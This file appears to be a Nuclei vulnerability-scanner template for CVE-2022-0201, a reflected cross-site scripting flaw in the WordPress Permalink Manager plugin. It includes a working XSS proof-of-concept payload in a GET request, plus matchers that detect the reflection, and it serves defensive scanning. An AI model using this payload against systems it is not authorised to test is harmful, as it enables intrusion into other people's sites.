nuclei-templates/http/cves/2022/CVE-2022-0201.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2022-05-05 17:02:43 +00:00
id: CVE-2022-0201
info:
name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
2022-05-05 17:02:43 +00:00
author: Akincibor
severity: medium
description: |
WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
2022-05-05 17:02:43 +00:00
reference:
- https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
- https://plugins.trac.wordpress.org/changeset/2656512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0201
cwe-id: CWE-79
epss-score: 0.00112
tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress
metadata:
max-request: 1
2022-05-05 17:02:43 +00:00
http:
2022-05-05 17:02:43 +00:00
- method: GET
path:
- '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(/XSS/)>'
- 'pm_query'
condition: and
- type: word
part: header
words:
- text/html